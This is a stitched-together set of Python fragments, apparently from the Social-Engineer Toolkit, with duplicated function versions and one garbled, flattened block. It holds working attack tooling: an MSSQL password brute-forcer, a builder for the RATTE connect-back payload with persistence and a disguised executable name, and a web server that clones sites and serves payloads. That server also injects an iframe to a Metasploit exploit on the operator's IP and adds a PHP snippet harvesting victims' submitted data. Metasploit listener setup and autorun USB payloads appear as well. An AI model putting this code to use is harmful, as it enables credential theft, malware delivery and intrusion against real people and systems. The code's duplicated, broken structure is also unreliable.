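def brute(ipaddr, username, port, wordlist):
    """Try every password in *wordlist* against the MSSQL server at ipaddr:port.

    ``ipaddr`` may be given as ``"host:port"``, in which case the embedded port
    overrides the ``port`` argument.  ``wordlist`` is a file path, or the
    literal ``"default"`` for the bundled ``src/fasttrack/wordlist.txt``.

    Returns ``"ipaddr,username,port,password"`` for the first password that
    logs in, or ``False`` when ``ipaddr`` is empty or nothing in the list
    worked.

    Raises ``IOError``/``OSError`` if the wordlist cannot be opened, and
    ``ValueError`` if ``ipaddr`` contains more than one colon (an IPv6
    literal is not supported by the ``host:port`` split).

    NOTE(review): every attempt, including the successful credential, is
    echoed to stdout -- treat the console transcript as sensitive.
    """
    # nothing to do without a target
    if ipaddr == "":
        return False
    if ":" in ipaddr:
        # "host:port" form; the embedded port wins over the argument
        ipaddr, port = ipaddr.split(":")
    ipaddr = str(ipaddr)
    port = str(port)

    if wordlist == "default":
        wordlist = "src/fasttrack/wordlist.txt"

    successful_password = None
    with open(wordlist) as passwordlist:
        for password in passwordlist:
            password = password.rstrip()
            print("Attempting to brute force {bold}{ipaddr}:{port}{endc}"
                  " with username of {bold}{username}{endc}"
                  " and password of {bold}{passwords}{endc}".format(
                      ipaddr=ipaddr, username=username, passwords=password,
                      port=port, bold=core.bcolors.BOLD, endc=core.bcolors.ENDC))
            try:
                target_server = _mssql.connect("{0}:{1}".format(ipaddr, port), username, password)
            except Exception:
                # A wrong password and an unreachable host both land here; the
                # driver exception is not inspected, so the two are not told
                # apart.  Only Exception is caught so that Ctrl-C still aborts
                # the run -- the previous bare ``except`` swallowed it too.
                continue
            if target_server:
                core.print_status("\nSuccessful login with username {0} and password: {1}".format(username, password))
                successful_password = password
                try:
                    # we only needed to know the login works; drop the session
                    target_server.close()
                except Exception:
                    pass
                break

    if successful_password is not None:
        return ",".join([ipaddr, username, port, successful_password])
    core.print_warning("Unable to guess the SQL password for {0} with username of {1}".format(ipaddr, username))
    return False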
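def scan(range, lowport, highport):
    """Scan *range* for MSSQL listeners on ports lowport..highport.

    Thin wrapper around ``src.core.portscan.launch``: whatever it returns is
    handed back unchanged, except that a ``False`` result is reported with a
    warning and returned as ``False``.  (The parameter name ``range`` shadows
    the builtin but is kept for callers.)
    """
    # imported lazily so this menu module loads without the scanner's deps
    from src.core import portscan
    # keep the module and its result under different names instead of
    # rebinding ``portscan`` to its own return value
    found = portscan.launch(range, lowport, highport)
    # ``!= False`` rather than ``is not False`` on purpose: an empty result
    # list is passed through, as callers were written to expect
    if found != False:
        return found
    # the original had a third ``return`` after this branch that could never
    # be reached; it is dropped here
    setcore.print_warning("No MSSQL servers were found in the ranges specified")
    return False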
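def scan(range, lowport, highport):
    """Port-scan *range* (lowport..highport) for MSSQL servers.

    Delegates to ``src.core.portscan.launch`` and returns its result.  When
    the scanner reports ``False`` a warning is printed and ``False`` is
    returned; every other value (including an empty list) is passed through.
    The parameter name ``range`` shadows the builtin but is part of the
    call signature and is left alone.
    """
    # lazy import keeps the scanner's dependencies out of menu load time
    from src.core import portscan as scanner
    results = scanner.launch(range, lowport, highport)
    # the original tested ``!= False`` first, then ``== False``, then fell
    # through to an unreachable ``return``; the two real outcomes are kept
    if results == False:
        setcore.print_warning("No MSSQL servers were found in the ranges specified")
        return False
    return results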
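def brute(ipaddr, username, port, wordlist):
    """Try each password in *wordlist* against the MSSQL server at ipaddr:port.

    ``wordlist`` is a file path or ``"default"`` for the bundled
    ``src/fasttrack/wordlist.txt``.  Returns ``"ipaddr,username,port,password"``
    for the first password that logs in, ``False`` if ``ipaddr`` is empty or
    no password worked.  Raises ``IOError`` if the wordlist cannot be opened.

    Written to run on Python 2 and 3 (``open``/``with``, function-style
    ``print`` with a single argument, ``except Exception:``).  The previous
    version used ``file()`` without closing it and ``except Exception, e``.

    NOTE(review): every candidate and the winning password are printed to the
    console.
    """
    if ipaddr == "":
        return False
    if wordlist == "default":
        wordlist = "src/fasttrack/wordlist.txt"

    found = None
    with open(wordlist, "r") as passwordlist:
        for passwords in passwordlist:
            passwords = passwords.rstrip()
            print("Attempting to brute force " + setcore.bcolors.BOLD + ipaddr + setcore.bcolors.ENDC + " with username of " + setcore.bcolors.BOLD + username + setcore.bcolors.ENDC + " and password of " + setcore.bcolors.BOLD + passwords + setcore.bcolors.ENDC)
            try:
                # connect to the sql server and attempt a password
                _mssql.connect(ipaddr + ":" + str(port), username, passwords)
            except Exception:
                # login failed or host unreachable -- both look the same here;
                # KeyboardInterrupt is no longer swallowed
                continue
            setcore.print_status("\nSuccessful login with username %s and password: %s" % (username, passwords))
            found = passwords
            break

    if found is not None:
        return ipaddr + "," + username + "," + str(port) + "," + found
    setcore.print_warning("Unable to guess the SQL password for %s with username of %s" % (ipaddr, username))
    return False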
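def brute(ipaddr, username, port, wordlist):
    """Password-spray one MSSQL login from a wordlist.

    Args:
        ipaddr: target host; an empty string makes the function return False.
        username: SQL login to try.
        port: TCP port (any value accepted by ``str()``).
        wordlist: path to a newline-separated password file, or ``"default"``
            for ``src/fasttrack/wordlist.txt``.

    Returns:
        ``"ipaddr,username,port,password"`` for the first successful login,
        otherwise ``False`` (after a warning).

    Raises:
        IOError: the wordlist cannot be opened (the file is now closed via
            ``with``; the old ``file()`` handle was never closed).

    Console output includes every password tried -- keep that in mind when
    logging the session.
    """
    if not ipaddr:
        return False
    if wordlist == "default":
        wordlist = "src/fasttrack/wordlist.txt"

    cracked = None
    with open(wordlist, "r") as handle:
        for candidate in handle:
            candidate = candidate.rstrip()
            # same text as before, built with %-formatting instead of a
            # long chain of concatenations
            print("Attempting to brute force %s%s%s with username of %s%s%s and password of %s%s%s" % (
                setcore.bcolors.BOLD, ipaddr, setcore.bcolors.ENDC,
                setcore.bcolors.BOLD, username, setcore.bcolors.ENDC,
                setcore.bcolors.BOLD, candidate, setcore.bcolors.ENDC))
            try:
                _mssql.connect(ipaddr + ":" + str(port), username, candidate)
            except Exception:
                # wrong password or unreachable host; Ctrl-C still propagates
                continue
            setcore.print_status("\nSuccessful login with username %s and password: %s" % (username, candidate))
            cracked = candidate
            break

    if cracked is None:
        setcore.print_warning("Unable to guess the SQL password for %s with username of %s" % (ipaddr, username))
        return False
    return ipaddr + "," + username + "," + str(port) + "," + cracked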
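def _ask_ip():
    """Prompt up to three times for the connect-back IP.

    Returns the first address that passes ``core.validate_ip``; after the
    third bad answer prints an error, waits and returns None.
    """
    for attempt in range(3):
        ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
        if core.validate_ip(ipaddr):
            return ipaddr
        if attempt == 2:
            core.print_error("\nMaybe you have the address written down wrong?")
            sleep(4)
    return None


def _ask_port(first_prompt, retry_prompt, default):
    """Prompt for a TCP port; blank or non-numeric input selects *default*.

    Re-prompts with *retry_prompt* while the value is outside 1..65535.
    Negative numbers were previously accepted (only 0 and >65535 were
    rejected); they are rejected here and reported with PORT_NOT_ZERO.
    """
    try:
        port = int(input(core.setprompt(["9", "2"], first_prompt)))
        while port < 1 or port > 65535:
            if port < 1:
                core.print_warning(text.PORT_NOT_ZERO)
            if port > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            port = int(input(core.setprompt(["9", "2"], retry_prompt)))
    except ValueError:
        port = default
    return port


def _ask_yes_no(prompt, invalid_msg):
    """Loop until the user answers y/yes or n/no (case-insensitive); True for yes."""
    while True:
        answer = input(core.setprompt(["9", "2"], prompt)).lower()
        if answer == "no" or answer == "n":
            return False
        if answer == "yes" or answer == "y":
            return True
        core.print_warning(invalid_msg)


def main():
    """Interactive RATTE setup.

    Asks for the connect-back IP, the RATTE listener port (default 8080),
    persistence and an optional file name, builds the payload with
    ``prepare_ratte`` and then offers to start ``ratte_listener_start``.

    BUG FIX: the previous version reused one ``valid_response`` flag for both
    yes/no questions; it was already True after the persistence question, so
    the "start the listener now?" loop never ran and the listener could not
    be started from this menu.
    """
    ipaddr = _ask_ip()
    if ipaddr is None:
        return

    ratteport = _ask_port("Port RATTE Server should listen on [8080]",
                          "Enter port RATTE Server should listen on [8080]", 8080)

    if _ask_yes_no("Should RATTE be persistent [no|yes]?", text.YES_NO_RESPONSES):
        persistent = "YES"
    else:
        persistent = "NO"

    customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)
    # join with a separator: ``core.setdir + "ratteM.exe"`` printed a wrong
    # path unless setdir happened to end in "/"
    core.print_status("Payload has been exported to %s" % os.path.join(core.setdir, "ratteM.exe"))

    ###################
    # start ratteserver
    ###################
    if _ask_yes_no("Start the ratteserver listener now [yes|no]",
                   "valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'"):
        core.print_info("Starting ratteserver...")
        ratte_listener_start(ratteport)
        core.print_info("Stopping ratteserver...")
        sleep(2)
    else:
        core.print_error("Aborting...")
        sleep(2)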
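from src.core.menu import text
# /etc/setoolkit goes on sys.path so that set_config is importable as a
# Python module -- i.e. that file is *executed*, not just parsed.
# NOTE(review): SET normally runs as root, so a writable /etc/setoolkit or
# set_config is root code execution.  Ownership/permissions are not checked
# here; make sure they are enforced at install time.
sys.path.append("/etc/setoolkit")
from set_config import AIRBASE_NG_PATH as airbase_path
from set_config import ACCESS_POINT_SSID as access_point
from set_config import AP_CHANNEL as ap_channel
from set_config import DNSSPOOF_PATH as dnsspoof_path
sys.path.append(core.definepath)
# Python 2 compatibility: use raw_input so answers are strings, not eval'd.
# Only NameError (raw_input missing on Python 3) is caught; the old bare
# ``except`` also hid KeyboardInterrupt and any other error.
try:
    input = raw_input
except NameError:
    pass
if not os.path.isfile("/etc/init.d/isc-dhcp-server"):
    core.print_warning("isc-dhcp-server does not appear to be installed.")
    core.print_warning("apt-get install isc-dhcp-server to install it. Things may fail now.")
# fall back to the Debian location for dnsspoof, otherwise leave SET
if not os.path.isfile(dnsspoof_path):
    if os.path.isfile("/usr/sbin/dnsspoof"):
        dnsspoof_path = "/usr/sbin/dnsspoof"
    else:
        core.print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
        core.exit_set()
# the bundled airbase-ng is addressed relative to the current directory, so
# this presumably relies on SET being started from its install root -- verify
if not os.path.isfile(airbase_path):
    airbase_path = "src/wireless/airbase-ng"
    core.print_info("using SET's local airbase-ng binary")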
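def web_server_start():
    """Stage the cloned or templated site and start serving it.

    Configuration comes from flag files under ``core.setdir`` (``meta_config``,
    ``site.template``, ``attack_vector``, ``multi_harvester``,
    ``multi_tabnabbing``, ``docbase.file``) and from ``set_config`` through
    ``core.check_config`` / ``core.check_options``.  Depending on ``template``
    (``SET`` / ``CUSTOM`` / ``SELF``) and ``attack_vector`` it rewrites
    ``index.html``, copies the payload binaries into ``web_clone/`` and then
    either spawns SET's own web server (``src.core.webserver``) or copies
    everything into the Apache document root.

    This view of the function ends right after ``msf_path`` is looked up; the
    original continues past that point.

    Fixes relative to the previous revision (see the BUG FIX comments):
    ``site.template`` was opened with the file name in the *mode* argument,
    ``multi_tabnabbing`` was looked for at the filesystem root, the docbase
    frameset still carried ``%%`` from an old %-format string, a path was
    joined without a separator, and two bare ``except:`` clauses swallowed
    ``KeyboardInterrupt``.
    """
    # ---- Apache or SET's own server? -------------------------------------
    apache = False
    apache_check = core.check_config("APACHE_SERVER=").lower()
    if apache_check == "on" or track_email == "on":
        apache_path = core.check_config("APACHE_DIRECTORY=")
        if os.path.isdir(os.path.join(apache_path, "html")):
            # NOTE(review): the join result is discarded, so apache_path is
            # never redirected into html/.  Presumably an assignment was
            # intended; left alone because every copy below writes to
            # apache_path exactly as configured -- confirm the intent.
            os.path.join(apache_path, "html")
        apache = True
    if operating_system == "windows":
        apache = False

    # ---- which port do we serve on? --------------------------------------
    # check_config returns a *string*; web_port only becomes the int 8080 when
    # meta_config puts Metasploit on SRVPORT 80.  The ``web_port != 8080``
    # comparisons further down are therefore "was that override applied?".
    web_port = core.check_config("WEB_PORT=")
    if os.path.isfile(os.path.join(core.setdir, "meta_config")):
        with open(os.path.join(core.setdir, "meta_config")) as fileopen:
            for line in fileopen:
                line = line.rstrip()
                match = re.search("set SRVPORT 80", line)
                if match:
                    match2 = re.search("set SRVPORT 8080", line)
                    if not match2:
                        web_port = 8080

    # ---- address that ends up in the served pages -----------------------
    if core.check_options("IPADDR=") != 0:
        ipaddr = core.check_options("IPADDR=")
    else:
        ipaddr = input("Enter your ip address: ")

    # ---- template / attack vector selection -----------------------------
    # unless a template was chosen, serve whatever was cloned ("SELF")
    template = "SELF"
    if os.path.isfile(os.path.join(core.setdir, "site.template")):
        # BUG FIX: this was open(core.setdir, "site.template") -- the file
        # name was passed as the mode and open() raised ValueError.
        with open(os.path.join(core.setdir, "site.template")) as fileopen:
            for line in fileopen:
                line = line.rstrip()
                template_match = re.search("TEMPLATE=", line)
                url_match = re.search("URL=", line)
                if url_match:
                    # URL that was cloned (not used in this part of the function)
                    url = line.split("=")[1].rstrip()
                if template_match:
                    template = line.split("=")[1]

    attack_vector = "nada"
    if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
        with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
            for line in fileopen:
                attack_vector = line.rstrip()

    # random file name for the served binary so it is not called msf.exe
    rand_gen = random_string()

    multiattack_harv = "off"
    if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
        multiattack_harv = "on"
    # BUG FIX: "/multi_tabnabbing" had a leading slash, which makes
    # os.path.join discard core.setdir -- the flag was looked for at "/".
    if os.path.isfile(os.path.join(core.setdir, "multi_tabnabbing")):
        multiattack_harv = "on"

    # ---- SET-built template: patch index.html in place -------------------
    if template == "SET":
        # NOTE: relative chdir -- relies on the CWD being SET's root and is
        # never restored before this function returns.
        os.chdir("src/html/")
        if os.path.isfile("index.html"):
            os.remove("index.html")
        if attack_vector == "java":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    match1 = re.search("msf.exe", line)
                    if match1:
                        line = line.replace("msf.exe", rand_gen)
                    match = re.search("ipaddrhere", line)
                    if match:
                        line = line.replace("ipaddrhere", ipaddr)
                    filewrite.write(line)
            # serve the payload under the random name
            shutil.copyfile("msf.exe", rand_gen)
        if attack_vector == "browser":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    # counter becomes 1 once a substitution below has written
                    # the line; untouched lines are written verbatim at the end
                    counter = 0
                    match = re.search(applet_name, line)
                    if match:
                        line = line.replace(applet_name, "invalid.jar")
                        filewrite.write(line)
                        counter = 1
                    match2 = re.search("<head>", line)
                    if match2:
                        # inject a small iframe pointing at the *other* port,
                        # where the Metasploit browser exploit is listening
                        if web_port != 8080:
                            line = line.replace("<head>", '<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'.format(ipaddr))
                            filewrite.write(line)
                            counter = 1
                        if web_port == 8080:
                            line = line.replace("<head>", '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'.format(ipaddr))
                            filewrite.write(line)
                            counter = 1
                    if counter == 0:
                        filewrite.write(line)

    # ---- cloned / custom site: drop the payload files into web_clone/ ----
    if template == "CUSTOM" or template == "SELF":
        if attack_vector != 'hid' and attack_vector != 'hijacking':
            print(core.bcolors.YELLOW + "[*] Moving payload into cloned website." + core.bcolors.ENDC)
            if not os.path.isfile(os.path.join(core.setdir, applet_name)):
                shutil.copyfile(os.path.join(definepath, "src/html/Signed_Update.jar.orig"), os.path.join(core.setdir, applet_name))
            shutil.copyfile(os.path.join(core.setdir, applet_name), os.path.join(core.setdir, "web_clone", applet_name))
            if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
                nix = core.check_options("NIX.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"), os.path.join(core.setdir, "web_clone", nix))
            if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
                mac = core.check_options("MAC.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"), os.path.join(core.setdir, "web_clone", mac))
            if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
                win = core.check_options("MSF.EXE=")
                shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone", win))
        core.print_status("The site has been moved. SET Web Server is now listening..")
        # a name recorded in the options file wins over the one generated above
        rand_gen = core.check_options("MSF_EXE=")
        if rand_gen:
            if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
                shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone/msf.exe"))
                print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
            shutil.copyfile(os.path.join(core.setdir, "web_clone/msf.exe"), os.path.join(core.setdir, "web_clone", rand_gen))

    # ---- docbase exploit: wrap the clone in a frameset -------------------
    if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
        # BUG FIX: the frameset read rows="99%%, 1%%", a leftover from when
        # this string went through %-formatting.  With str.format the doubled
        # percent signs were emitted literally.
        docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET rows="99%, 1%">
<FRAME src="site.html">
<FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080">
</FRAMESET>
</HTML>""".format(ipaddr))
        if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
            os.remove(os.path.join(core.setdir, "web_clone/site.html"))
        shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"), os.path.join(core.setdir, "web_clone/site.html"))
        with open(os.path.join(core.setdir, "web_clone/index.html"), "w") as filewrite:
            filewrite.write(docbase)

    ##########################################################################
    #
    # START WEB SERVER STUFF HERE
    #
    ##########################################################################
    if not apache:
        if multiattack_harv == 'off':
            try:
                # document root for SET's own server
                path = os.path.join(core.setdir, "web_clone/")
                try:
                    import src.core.webserver as webserver
                    p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
                    p.start()
                except Exception:
                    # multiprocessing failed: fall back to a bare thread.
                    # Narrowed from a bare except so Ctrl-C still works.  If
                    # the *import* is what failed, ``webserver`` is unbound here
                    # and the NameError surfaces through the handler below.
                    thread.start_new_thread(webserver.start_server, (web_port, path))
            except KeyboardInterrupt:
                core.exit_set()
            except Exception as e:
                core.log(e)
                print("{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
                      "[!] There was an issue, printing error: {1}{2}".format(core.bcolors.RED, e, core.bcolors.ENDC))
                # NOTE: an empty answer counts as "yes" -- plain Enter stops the
                # system's Apache.
                stop_apache = input("Attempt to stop Apache? y/n: ")
                if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
                    subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
                    try:
                        import src.core.webserver as webserver
                        # BUG FIX: was os.path.join(core.setdir + "web_clone"),
                        # which only works when setdir ends with a slash
                        path = os.path.join(core.setdir, "web_clone")
                        p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
                        p.start()
                    except Exception:
                        print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".format(core.bcolors.RED, core.bcolors.ENDC))
                        sys.exit()
        # with an operator-supplied payload, keep this process (and with it the
        # server thread) alive until Ctrl-C; the listener is their job
        if template == "CUSTOM" or template == "SELF":
            custom_exe = core.check_options("CUSTOM_EXE=")
            if custom_exe:
                while True:
                    try:
                        core.print_warning("Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!")
                        input("\n{0}[*] Web Server is listening. Press Control-C to exit.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))
                    except KeyboardInterrupt:
                        print("{0}[*] Returning to main menu.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))
                        break

    if apache:
        # NOTE(review): shell=True with apache_path interpolated from
        # set_config.  The value is operator-controlled, so this is not an
        # injection surface in the usual sense, but a path containing spaces
        # or shell metacharacters breaks or misdirects the copy, and every
        # error is discarded (stdout/stderr piped, exit status ignored).
        subprocess.Popen("cp {0} {apache_path};"
                         "cp {1} {apache_path};"
                         "cp {2} {apache_path};"
                         "cp {3} {apache_path};"
                         "cp {4} {apache_path}".format(os.path.join(definepath, "src/html/*.bin"),
                                                        os.path.join(definepath, "src/html/*.html"),
                                                        os.path.join(core.setdir, "web_clone/*"),
                                                        os.path.join(core.setdir, "msf.exe"),
                                                        os.path.join(core.setdir, "*.jar"),
                                                        apache_path=apache_path),
                         shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).wait()
        if track_email == "on":
            now = datetime.datetime.today()
            # NOTE(review): the harvester log is created *inside* the Apache
            # document root -- the same directory the cloned site is copied
            # into -- and handed to www-data so index.php can append to it.
            # Anything Apache serves from that directory, this file included
            # if its name is guessed or the directory is listable, is reachable
            # by the targets themselves.  Keep the log outside the docroot or
            # deny access to it in the Apache configuration.
            with open(os.path.join(apache_path, "harvester_{}.txt".format(now)), 'w') as filewrite:
                filewrite.write("")
            subprocess.Popen("chown www-data:www-data '{0}'".format(os.path.join(apache_path, "harvester_{}.txt".format(now))), shell=True).wait()
            # turn the cloned index.html into index.php with a snippet that
            # appends every GET parameter to the harvester file
            with open(os.path.join(apache_path, "index.html")) as fileopen:
                data = fileopen.read()
            data = data.replace("<body>", "<body>"
                                "<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
                                "/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */".format(now))
            with open(os.path.join(apache_path, "index.php"), "w") as filewrite:
                filewrite.write(data)
        core.print_status("All files have been copied to {}".format(apache_path))
    ##########################################################################
    #
    # END WEB SERVER STUFF HERE
    #
    ##########################################################################
    if operating_system != "windows":
        # Grab metaspoit path (consumed by the remainder of this function,
        # which is outside this excerpt)
        msf_path = core.meta_path()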
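# Walk config/set_config once: pick up the UPX settings and refuse to start
# if the interactive shell has been switched off.
with open("config/set_config", "r") as fileopen:
    for line in fileopen:
        line = line.rstrip()
        # define if we use upx encoding or not
        match = re.search("UPX_ENCODE=", line)
        if match:
            upx_encode = line.replace("UPX_ENCODE=", "")
        # set the upx flag
        match1 = re.search("UPX_PATH=", line)
        if match1:
            upx_path = line.replace("UPX_PATH=", "")
            # NOTE: upx_encode is only bound once a UPX_ENCODE= line has been
            # read, so this relies on UPX_ENCODE= preceding UPX_PATH= in the
            # config; a file with the reverse order raises NameError here.
            if upx_encode == "ON":
                if not os.path.isfile(upx_path):
                    if operating_system != "windows":
                        setcore.print_warning("UPX packer not found in the pathname specified in config. Disabling UPX packing for executable")
                        # BUG FIX: this was ``upx_encode == "OFF"`` -- a
                        # comparison, not an assignment -- so UPX was never
                        # actually disabled despite the warning.
                        upx_encode = "OFF"
        # if we removed the set shells to free up space, needed for pwniexpress
        match2 = re.search("SET_INTERACTIVE_SHELL=", line)
        if match2:
            line = line.replace("SET_INTERACTIVE_SHELL=", "").lower()
            if line == "off":
                sys.exit("\n [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config")
# make directory if it's not there
if not os.path.isdir("src/program_junk/web_clone/"):
    os.makedirs("src/program_junk/web_clone/")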
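def main():
    """Interactive RATTE setup: ask for IP, port, persistence and file name, build, optionally listen.

    Three invalid IP answers abort the module.  A blank or non-numeric port
    answer selects 8080.  The payload is written by ``prepare_ratte`` and the
    listener, if requested, is run by ``ratte_listener_start``.

    BUG FIX: the previous version asked "Should RATTE be persistent?" and
    "Start the ratteserver listener now?" under one shared ``valid_response``
    flag.  After the first question it was already True, so the second loop
    never executed and the listener could not be started from here.
    """
    #################
    # get User Input
    #################
    valid_ip = False
    input_counter = 0
    while not valid_ip and input_counter < 3:
        ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error("\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            input_counter += 1

    # port: blank/non-numeric -> 8080; re-ask while outside 1..65535
    # (negative values used to slip through because only 0 was rejected)
    try:
        ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
        while ratteport < 1 or ratteport > 65535:
            if ratteport < 1:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(input(core.setprompt(["9", "2"], "Enter port RATTE Server should listen on [8080]")))
    except ValueError:
        ratteport = 8080

    persistent = None
    while persistent is None:
        answer = input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")).lower()
        if answer == "no" or answer == "n":
            persistent = "NO"
        elif answer == "yes" or answer == "y":
            persistent = "YES"
        else:
            core.print_warning(text.YES_NO_RESPONSES)

    customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)
    core.print_status("Payload has been exported to %s" % os.path.join(core.userconfigpath, "ratteM.exe"))

    ###################
    # start ratteserver
    ###################
    start_listener = None
    while start_listener is None:
        prompt = input(core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]")).lower()
        if prompt == "no" or prompt == "n":
            start_listener = False
        elif prompt == "yes" or prompt == "y":
            start_listener = True
        else:
            core.print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
    if start_listener:
        core.print_info("Starting ratteserver...")
        ratte_listener_start(ratteport)
        core.print_info("Stopping ratteserver...")
    else:
        core.print_error("Aborting...")
    sleep(2)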
core.exit_set() # if we are running posix then check to see what the process is first if operating_system == "posix": # if we detect an apache installation if os.path.isfile("/etc/init.d/apache2"): apache_stop = input("[!] Apache may be running, do you want SET to stop the process? [y/n]: ") if apache_stop.lower() == "y" or apache_stop.lower() == "yes": core.print_status("Attempting to stop apache.. One moment..") # stop apache here subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait() try: ipaddr.connect(('localhost', web_port)) if ipaddr: core.print_warning("If you want to use Apache, edit the /etc/setoolkit/set.config") core.print_error("Exit whatever is listening and restart SET") core.exit_set() # if it couldn't connect to localhost, we are good to # go and continue forward except: core.print_status("Success! Apache was stopped. Moving forward within SET...") # if we don't want to stop apache then exit SET and flag # user if apache_stop.lower() == "n" or apache_stop.lower() == "no": core.print_warning("If you want to use Apache, edit the /etc/setoolkit/set.config and turn apache on") core.print_error("Exit whatever is lsitening or turn Apache on in set_config and restart SET") core.exit_set() else: core.print_warning("If you want to use Apache, edit the /etc/setoolkit/set.config")
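core.print_status("Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
core.print_status("Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")
# if we want to launch payload and automatically create listener
# (``trigger`` and ``msf_path`` are defined earlier in the file)
if trigger in [1, 2, 3]:
    choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]")
    if choice1.lower() == "yes" or choice1.lower() == "y":
        # if we used something to create other than solo.py then write out the
        # listener: one multi/handler stanza per "<payload> <lhost> <lport>"
        # line of payload.options
        if not os.path.isfile(os.path.join(core.setdir, "meta_config")):
            with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \
                    open(os.path.join(core.setdir, "payload.options")) as fileopen:
                for line in fileopen:
                    # split() instead of split(" "): drops the trailing newline
                    # that used to be written into "set lport ..."
                    parts = line.split()
                    if len(parts) < 3:
                        # blank or malformed line -- previously an IndexError
                        continue
                    filewrite.write("use multi/handler\n")
                    filewrite.write("set payload {0}\n".format(parts[0]))
                    filewrite.write("set lhost {0}\n".format(parts[1]))
                    filewrite.write("set lport {0}\n".format(parts[2]))
                    filewrite.write("set ExitOnSession false\n")
                    filewrite.write("exploit -j\r\n\r\n")
        # create the listener
        core.print_status("Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
        # argv list instead of a shell=True string: msf_path comes from the
        # config, and a path with spaces or shell metacharacters no longer
        # needs quoting (or gets interpreted by the shell)
        subprocess.Popen([os.path.join(msf_path, "msfconsole"), "-r", os.path.join(core.setdir, "meta_config")]).wait()
    else:
        core.print_warning("cancelling...")
        sleep(2)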
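def _ask_website():
    """Prompt (up to three times) for an http(s) URL with a host part.

    Returns the URL string, or None after the third unusable answer (an
    error is printed and the function sleeps 4 s first, as before).
    """
    for attempt in range(3):
        website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
        site = urlparse.urlparse(website)
        scheme_ok = site.scheme == "http" or site.scheme == "https"
        if scheme_ok and site.netloc != "":
            return website
        if attempt == 2:
            core.print_error("\nMaybe you have the address written down wrong?")
            sleep(4)
            return None
        if scheme_ok:
            core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
        else:
            core.print_warning("I couldn't determine whether this is an http or https site. Try again?")
    return None


def _ask_callback_ip():
    """Prompt up to three times for the connect-back IP; None after three bad answers."""
    for attempt in range(3):
        ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
        if core.validate_ip(ipaddr):
            return ipaddr
        if attempt == 2:
            core.print_error("\nMaybe you have the address written down wrong?")
            sleep(4)
            return None
    return None


def _ask_port(prompt, default, not_equal=None):
    """Prompt for a TCP port in 1..65535 (and != *not_equal*); blank/non-numeric input gives *default*.

    Tightened relative to the original: negative numbers were accepted
    (only 0 was tested) and the default was never checked against
    ``not_equal`` -- with javaport 8080 a blank RATTE port silently collided.
    """
    while True:
        try:
            port = int(raw_input(core.setprompt(["9", "2"], prompt)))
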